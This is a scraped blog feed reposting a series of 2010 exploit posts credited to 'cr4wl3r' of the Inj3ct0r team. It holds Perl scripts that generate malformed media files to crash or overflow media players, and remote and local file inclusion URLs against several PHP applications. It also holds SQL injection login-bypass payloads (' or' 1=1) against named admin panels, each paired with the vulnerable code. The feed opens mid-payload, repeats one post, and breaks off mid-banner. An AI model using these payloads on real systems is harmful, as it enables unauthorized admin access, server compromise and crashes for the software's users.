/>"\x54\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x54\x00\x30\x54\x81\x5c\x3c\x00\x00\x30".<br />"\x00\x13\x29\x54\x65\x29\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00".<br />"\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54".<br />"\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13\x40\x52\x00\x3c".<br />"\x52\x01\x37\x52\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13".<br />"\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x51".<br />"\x65\x2b\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37".<br />"\x00\x13\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00".<br />"\x3b\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51".<br />"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c".<br />"\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x35\x51\x65\x35\x00\x13".<br />"\x3e\x51\x00\x3c\x51\x01\x39\x51\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x36\x51".<br />"\x65\x36\x00\x13\x3e\x51\x00\x3d\x51\x01\x39\x51\x64\x3e\x00\x00\x3d\x00\x00\x39".<br />"\x00\x13\x37\x51\x65\x37\x00\x13\x40\x51\x00\x3c\x51\x65\x40\x00\x00\x3c\x00\x13".<br />"\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".<br />"\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x3e\x51\x00\x37\x51\x65\x3e\x00\x00\x37".<br />"\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x4f\x00\x24\x4f".<br />"\x65\x30\x00\x00\x24\x00\x81\x0c\x30\x51\x00\x24\x51\x64\x30\x00\x00\x24\x00\x81".<br />"\x0c\xff\x2f\x00\x00";<br />#######################################################################################<br />open(file, "> sploit.wav");<br />binmode(file);<br />print (file $buff);<br />#######################################################################################<br />print "\n[+] Done!\n<br />[+] Open with Gom Player\n<br />[+] Coded by cr4wl3r\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-294260708924784588?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-70245523093231175812010-03-04T10:23:00.001-08:002010-03-04T10:23:32.054-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />print "<br />[+]--------------------------------------------------------------[+]<br />[+] Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit [+]<br />[+] By : cr4wl3r [+]<br />[+]--------------------------------------------------------------[+]<br />";<br /> <br /> <br />$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";<br /> <br />open(file, "> sploit.avi");<br />print (file $buff);<br />print "\n\n[+] Done!\n<br />[+] Open with Media Player Classic\n<br />[+] Coded by cr4wl3r\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7024552309323117581?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-20730214325771184152010-03-04T10:22:00.002-08:002010-03-04T10:23:09.558-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />print "<br />[+]-----------------------------------------------[+]<br />[+] VKPlayer 1.0 (.mid) Denial of Service Exploit [+]<br />[+] By : cr4wl3r [+]<br />[+]-----------------------------------------------[+]<br />";<br /> <br />$buff =<br />"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64".<br />"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8".<br />"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".<br />"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".<br />"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";<br />#######################################################################################<br />open(file, "> sploit.mid");<br />print (file $buff);<br />#######################################################################################<br />print "\n[+] Done!\n<br />[+] Open with VKPlayer and play\n<br />[+] Coded by cr4wl3r\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2073021432577118415?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-11115554056972501802010-03-04T10:22:00.001-08:002010-03-04T10:22:40.519-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />print "<br />[+]---------------------------------------------------------------------[+]<br />[+] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [+]<br />[+] By : cr4wl3r [+]<br />[+]---------------------------------------------------------------------[+]<br />";<br /> <br /> <br />$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";<br /> <br />open(file, "> sploit.mpg");<br />print (file $buff);<br />print "\n\n[+] Done...!!!\n<br />[+] Open with Windows Media Player\n<br />[+] Coded by cr4wl3r\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1111555405697250180?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-33437753958339230112010-03-04T10:21:00.002-08:002010-03-04T10:22:09.846-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />###############################################################<br />Vuln : include("include/_".$id.".php");<br />###############################################################<br />PoC : [Saskia_path]/content.php?id=[LFI]<br />###############################################################<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3343775395833923011?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-9964874304670535552010-03-04T10:21:00.001-08:002010-03-04T10:21:39.159-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[+] Code :<br /><br />##################################################################<br />[content.php]<br /><br /><?php include("../posts/$filename-posts.php"); ?><br />##################################################################<br /><br />[+] Example :<br /><br /><br /> [simplePMS_path]/include/content.php?filename=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-996487430467053555?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-66844819489688347452010-03-04T10:20:00.002-08:002010-03-04T10:21:04.207-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[+] Code :<br /> <br />##################################################################<br />[page.php]<br /> <br />require_once($dir_install . $dir_src . "common.php");<br />##################################################################<br /> <br />[+] Example :<br /> <br />##################################################################<br />[x] RFI :<br /> <br /> [Izumi_path]/src/page.php?dir_install=[Shell]<br /> <br />[x] LFI :<br /> <br /> [Izumi_path]/src/page.php?dir_src=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6684481948968834745?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-71171600947832600812010-03-04T10:20:00.001-08:002010-03-04T10:20:40.256-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[+] Vuln Code :<br /> <br />[adminlogin.php]<br /> <br /><?php<br />include("common.php");<br />if (!empty($_POST['password'])) {<br /> $username = $_POST['username'];<br /> $password = $_POST['password'];<br /> <br /> $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";<br /> $result1 = db_query($query);<br /> $rows = db_num_rows($result1);<br /> $row = db_fetch_array($result1);<br /> if ($rows != 0) {<br /> if (session_is_registered("whossession")) {<br /> $_SESSION['who'] = "admin";<br /> $_SESSION['userrole'] = "admin";<br /> $_SESSION['username'] = $username;<br /> $_SESSION['usernum'] = $row["userid"];<br /> header("location:admin.php");<br /> } else {<br /> session_register("whossession");<br /> $_SESSION['who'] = "admin";<br /> $_SESSION['userrole'] = "admin";<br /> $_SESSION['username'] = $username;<br /> $_SESSION['usernum'] = $row["userid"];<br /> header("location:admin.php");<br /> }<br /> } else {<br /> header("location:adminlogin.php?error=yes");<br /> }<br />} else {<br /> <br /> ?><br /> <br />[+] PoC :<br /> <br />[BaalSystems_path]/adminlogin.php<br /> <br /> <br />username: ' or' 1=1<br />Password: ' or' 1=1[+] Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability<br />[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org><br /> <br />[+] Vuln Code :<br /> <br />[adminlogin.php]<br /> <br /><?php<br />include("common.php");<br />if (!empty($_POST['password'])) {<br /> $username = $_POST['username'];<br /> $password = $_POST['password'];<br /> <br /> $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";<br /> $result1 = db_query($query);<br /> $rows = db_num_rows($result1);<br /> $row = db_fetch_array($result1);<br /> if ($rows != 0) {<br /> if (session_is_registered("whossession")) {<br /> $_SESSION['who'] = "admin";<br /> $_SESSION['userrole'] = "admin";<br /> $_SESSION['username'] = $username;<br /> $_SESSION['usernum'] = $row["userid"];<br /> header("location:admin.php");<br /> } else {<br /> session_register("whossession");<br /> $_SESSION['who'] = "admin";<br /> $_SESSION['userrole'] = "admin";<br /> $_SESSION['username'] = $username;<br /> $_SESSION['usernum'] = $row["userid"];<br /> header("location:admin.php");<br /> }<br /> } else {<br /> header("location:adminlogin.php?error=yes");<br /> }<br />} else {<br /> <br /> ?><br /> <br />[+] PoC :<br /> <br />[BaalSystems_path]/adminlogin.php<br /> <br /> <br />username: ' or' 1=1<br />Password: ' or' 1=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7117160094783260081?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-38310622135194185302010-03-04T10:19:00.002-08:002010-03-04T10:20:10.713-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[+] Vuln Code :<br /> <br />[userlogin.php]<br /> <br />if (!empty($_POST['password']))<br />{<br /> $username =$_POST['username'];<br /> $password =$_POST['password'];<br /> dbConnect();<br /> $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'". mysql_error());<br /> <br />[+] PoC :<br /> <br />[ZenTracking_path]/userlogin.php<br /> <br />username: ' or' 1=1<br />Password: ' or' 1=1<br /> <br /> <br />[+] Vuln Code :<br /> <br />[managerlogin.php]<br /> <br />if (!empty($_POST['password']))<br />{<br /> $username =$_POST['username'];<br /> $password =$_POST['password'];<br /> dbConnect();<br /> $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'". mysql_error());<br /> <br />[+] PoC :<br /> <br />[ZenTracking_path]/managerlogin.php<br /> <br />username: ' or' 1=1<br />Password: ' or' 1=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3831062213519418530?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-79319271963216786552010-03-04T10:19:00.001-08:002010-03-04T10:19:42.885-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[authenticate.php]<br /> <br /> $isadmin=$_POST['isadmin'];<br /> $password=$_POST['password'];<br /> $password=md5($password);<br /> $query = "select * from km_admins where username='$isadmin' and password='$password'";<br /> $result = mysql_query($query) ;<br /> <br /> <br /> <br /> <br />[+] PoC : [Killmonster_path]/admin/login.php<br /> <br />username : ' or' 1=1<br />password : ' or' 1=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7931927196321678655?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-87270357606709600352010-03-04T10:18:00.000-08:002010-03-04T10:19:16.431-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[+] Vuln Code : [common_foot.php]<br /> <br />include($config['path']."idx_foot.html");<br />if($config["debug"]>0){<br /><br /> echo '$_POST:';var_dump($_POST);<br /> <br />[+] PoC :<br /> <br />[EncapsCMS_path]/common_foot.php?config[path]=[Shell]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8727035760670960035?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-31108166034058030622010-03-04T10:17:00.000-08:002010-03-04T10:18:26.611-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[+] Vuln Code :<br /> <br />[index.php]<br /> <br />if ($_POST['userid'] && $_POST['password'])<br />{<br /> // if the user has just tried to log in<br /> $logquery = "select * from users "<br /> ."where username='$userid' "<br /> ." and passwd='$password' ";<br /> <br />[+] PoC :<br /> <br />username : ' or' 1=1<br />password : ' or' 1=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3110816603405803062?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-37908803479678577212010-03-04T10:16:00.004-08:002010-03-04T10:17:54.707-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 